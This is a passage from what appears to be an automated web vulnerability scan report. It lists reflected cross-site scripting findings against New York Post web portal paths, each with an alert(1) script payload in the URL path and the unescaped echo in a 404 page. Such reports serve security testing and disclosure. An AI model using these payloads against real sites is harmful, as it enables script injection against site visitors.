<p>/r/SysConfig/WebPortal/nypost/blocks/masthead/last_updated.htmb5752<script>alert(1)</script>9d2d05dbc3</p>
...[SNIP]...

1.457. http://www.nypost.com/r/SysConfig/WebPortal/nypost/blocks/masthead/masthead.js [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /r/SysConfig/WebPortal/nypost/blocks/masthead/masthead.js

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 71c33<script>alert(1)</script>9a2c668fa7 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /r/SysConfig71c33<script>alert(1)</script>9a2c668fa7/WebPortal/nypost/blocks/masthead/masthead.js HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 712
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:33:12 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/r/SysConfig71c33<script>alert(1)</script>9a2c668fa7/WebPortal/nypost/blocks/masthead/masthead.js</p>
...[SNIP]...

1.458. http://www.nypost.com/r/SysConfig/WebPortal/nypost/blocks/masthead/masthead.js [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /r/SysConfig/WebPortal/nypost/blocks/masthead/masthead.js

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 4dd2c<script>alert(1)</script>c01aff57693 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /r/SysConfig/WebPortal4dd2c<script>alert(1)</script>c01aff57693/nypost/blocks/masthead/masthead.js HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 713
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:33:14 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/r/SysConfig/WebPortal4dd2c<script>alert(1)</script>c01aff57693/nypost/blocks/masthead/masthead.js</p>
...[SNIP]...

1.459. http://www.nypost.com/r/SysConfig/WebPortal/nypost/blocks/masthead/masthead.js [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /r/SysConfig/WebPortal/nypost/blocks/masthead/masthead.js

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload eb416<script>alert(1)</script>8688fb62039 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /r/SysConfig/WebPortal/nyposteb416<script>alert(1)</script>8688fb62039/blocks/masthead/masthead.js HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 713
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:33:15 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/r/SysConfig/WebPortal/nyposteb416<script>alert(1)</script>8688fb62039/blocks/masthead/masthead.js</p>
...[SNIP]...

1.460. http://www.nypost.com/r/SysConfig/WebPortal/nypost/blocks/masthead/masthead.js [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /r/SysConfig/WebPortal/nypost/blocks/masthead/masthead.js

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 932f8<script>alert(1)</script>87e8580f29e was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /r/SysConfig/WebPortal/nypost/blocks932f8<script>alert(1)</script>87e8580f29e/masthead/masthead.js HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 713
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:33:17 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/r/SysConfig/WebPortal/nypost/blocks932f8<script>alert(1)</script>87e8580f29e/masthead/masthead.js</p>
...[SNIP]...

1.461. http://www.nypost.com/r/SysConfig/WebPortal/nypost/blocks/masthead/masthead.js [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /r/SysConfig/WebPortal/nypost/blocks/masthead/masthead.js

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload 27b0c<script>alert(1)</script>7b782001792 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /r/SysConfig/WebPortal/nypost/blocks/masthead27b0c<script>alert(1)</script>7b782001792/masthead.js HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 713
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:33:19 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/r/SysConfig/WebPortal/nypost/blocks/masthead27b0c<script>alert(1)</script>7b782001792/masthead.js</p>
...[SNIP]...

1.462. http://www.nypost.com/r/SysConfig/WebPortal/nypost/blocks/masthead/masthead.js [REST URL parameter 7]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /r/SysConfig/WebPortal/nypost/blocks/masthead/masthead.js

Issue detail

The value of REST URL parameter 7 is copied into the HTML document as plain text between tags. The payload fadb9<script>alert(1)</script>22e27319abf was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /r/SysConfig/WebPortal/nypost/blocks/masthead/masthead.jsfadb9<script>alert(1)</script>22e27319abf HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 713
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:33:22 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/r/SysConfig/WebPortal/nypost/blocks/masthead/masthead.jsfadb9<script>alert(1)</script>22e27319abf</p>
...[SNIP]...

1.463. http://www.nypost.com/r/SysConfig/WebPortal/nypost/blocks/most_popular/most_popular_functions.js [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /r/SysConfig/WebPortal/nypost/blocks/most_popular/most_popular_functions.js

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 7423d<script>alert(1)</script>126b9e6e9b0 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /r/SysConfig7423d<script>alert(1)</script>126b9e6e9b0/WebPortal/nypost/blocks/most_popular/most_popular_functions.js HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 731
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:33:22 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/r/SysConfig7423d<script>alert(1)</script>126b9e6e9b0/WebPortal/nypost/blocks/most_popular/most_popular_functions.js</p>
...[SNIP]...

1.464. http://www.nypost.com/r/SysConfig/WebPortal/nypost/blocks/most_popular/most_popular_functions.js [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /r/SysConfig/WebPortal/nypost/blocks/most_popular/most_popular_functions.js

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 6f8a0<script>alert(1)</script>b945617608 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /r/SysConfig/WebPortal6f8a0<script>alert(1)</script>b945617608/nypost/blocks/most_popular/most_popular_functions.js HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 730
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:33:24 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/r/SysConfig/WebPortal6f8a0<script>alert(1)</script>b945617608/nypost/blocks/most_popular/most_popular_functions.js</p>
...[SNIP]...

1.465. http://www.nypost.com/r/SysConfig/WebPortal/nypost/blocks/most_popular/most_popular_functions.js [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /r/SysConfig/WebPortal/nypost/blocks/most_popular/most_popular_functions.js

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 45957<script>alert(1)</script>418b31416ee was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /r/SysConfig/WebPortal/nypost45957<script>alert(1)</script>418b31416ee/blocks/most_popular/most_popular_functions.js HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 731
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:33:26 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/r/SysConfig/WebPortal/nypost45957<script>alert(1)</script>418b31416ee/blocks/most_popular/most_popular_functions.js</p>
...[SNIP]...

1.466. http://www.nypost.com/r/SysConfig/WebPortal/nypost/blocks/most_popular/most_popular_functions.js [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /r/SysConfig/WebPortal/nypost/blocks/most_popular/most_popular_functions.js

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload ffad8<script>alert(1)</script>a8feeea4c7a was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /r/SysConfig/WebPortal/nypost/blocksffad8<script>alert(1)</script>a8feeea4c7a/most_popular/most_popular_functions.js HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 731
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:33:29 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/r/SysConfig/WebPortal/nypost/blocksffad8<script>alert(1)</script>a8feeea4c7a/most_popular/most_popular_functions.js</p>
...[SNIP]...

1.467. http://www.nypost.com/r/SysConfig/WebPortal/nypost/blocks/most_popular/most_popular_functions.js [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /r/SysConfig/WebPortal/nypost/blocks/most_popular/most_popular_functions.js

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload 330e6<script>alert(1)</script>51f07698fa was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /r/SysConfig/WebPortal/nypost/blocks/most_popular330e6<script>alert(1)</script>51f07698fa/most_popular_functions.js HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 730
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:33:31 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/r/SysConfig/WebPortal/nypost/blocks/most_popular330e6<script>alert(1)</script>51f07698fa/most_popular_functions.js</p>
...[SNIP]...

1.468. http://www.nypost.com/r/SysConfig/WebPortal/nypost/blocks/most_popular/most_popular_functions.js [REST URL parameter 7]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /r/SysConfig/WebPortal/nypost/blocks/most_popular/most_popular_functions.js

Issue detail

The value of REST URL parameter 7 is copied into the HTML document as plain text between tags. The payload 3c1eb<script>alert(1)</script>dda135f85c3 was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /r/SysConfig/WebPortal/nypost/blocks/most_popular/most_popular_functions.js3c1eb<script>alert(1)</script>dda135f85c3 HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 731
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:33:33 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/r/SysConfig/WebPortal/nypost/blocks/most_popular/most_popular_functions.js3c1eb<script>alert(1)</script>dda135f85c3</p>
...[SNIP]...

1.469. http://www.nypost.com/r/SysConfig/WebPortal/nypost/blocks/polls/poll_functions.js [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /r/SysConfig/WebPortal/nypost/blocks/polls/poll_functions.js

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 2ffad<script>alert(1)</script>46814ff2e7 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /r/SysConfig2ffad<script>alert(1)</script>46814ff2e7/WebPortal/nypost/blocks/polls/poll_functions.js HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 715
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:33:38 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/r/SysConfig2ffad<script>alert(1)</script>46814ff2e7/WebPortal/nypost/blocks/polls/poll_functions.js</p>
...[SNIP]...

1.470. http://www.nypost.com/r/SysConfig/WebPortal/nypost/blocks/polls/poll_functions.js [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /r/SysConfig/WebPortal/nypost/blocks/polls/poll_functions.js

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 34cc2<script>alert(1)</script>8d75df63245 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /r/SysConfig/WebPortal34cc2<script>alert(1)</script>8d75df63245/nypost/blocks/polls/poll_functions.js HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 716
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:33:40 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/r/SysConfig/WebPortal34cc2<script>alert(1)</script>8d75df63245/nypost/blocks/polls/poll_functions.js</p>
...[SNIP]...

1.471. http://www.nypost.com/r/SysConfig/WebPortal/nypost/blocks/polls/poll_functions.js [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /r/SysConfig/WebPortal/nypost/blocks/polls/poll_functions.js

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload ee309<script>alert(1)</script>6d68ee05997 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /r/SysConfig/WebPortal/nypostee309<script>alert(1)</script>6d68ee05997/blocks/polls/poll_functions.js HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 716
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:33:41 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/r/SysConfig/WebPortal/nypostee309<script>alert(1)</script>6d68ee05997/blocks/polls/poll_functions.js</p>
...[SNIP]...

1.472. http://www.nypost.com/r/SysConfig/WebPortal/nypost/blocks/polls/poll_functions.js [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /r/SysConfig/WebPortal/nypost/blocks/polls/poll_functions.js

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 3823a<script>alert(1)</script>0b8de5eb651 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /r/SysConfig/WebPortal/nypost/blocks3823a<script>alert(1)</script>0b8de5eb651/polls/poll_functions.js HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 716
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:33:43 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/r/SysConfig/WebPortal/nypost/blocks3823a<script>alert(1)</script>0b8de5eb651/polls/poll_functions.js</p>
...[SNIP]...

1.473. http://www.nypost.com/r/SysConfig/WebPortal/nypost/blocks/polls/poll_functions.js [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /r/SysConfig/WebPortal/nypost/blocks/polls/poll_functions.js

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload 777d0<script>alert(1)</script>15709d8a432 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /r/SysConfig/WebPortal/nypost/blocks/polls777d0<script>alert(1)</script>15709d8a432/poll_functions.js HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 716
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:33:45 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/r/SysConfig/WebPortal/nypost/blocks/polls777d0<script>alert(1)</script>15709d8a432/poll_functions.js</p>
...[SNIP]...

1.474. http://www.nypost.com/r/SysConfig/WebPortal/nypost/blocks/polls/poll_functions.js [REST URL parameter 7]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /r/SysConfig/WebPortal/nypost/blocks/polls/poll_functions.js

Issue detail

The value of REST URL parameter 7 is copied into the HTML document as plain text between tags. The payload 727e8<script>alert(1)</script>4709bb85bf7 was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /r/SysConfig/WebPortal/nypost/blocks/polls/poll_functions.js727e8<script>alert(1)</script>4709bb85bf7 HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 716
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:33:47 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/r/SysConfig/WebPortal/nypost/blocks/polls/poll_functions.js727e8<script>alert(1)</script>4709bb85bf7</p>
...[SNIP]...

1.475. http://www.nypost.com/r/SysConfig/WebPortal/nypost/blocks/search/search.js [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /r/SysConfig/WebPortal/nypost/blocks/search/search.js

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 8bac9<script>alert(1)</script>42516a33a4b was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /r/SysConfig8bac9<script>alert(1)</script>42516a33a4b/WebPortal/nypost/blocks/search/search.js HTTP/1.1
Host: www.nypost.com
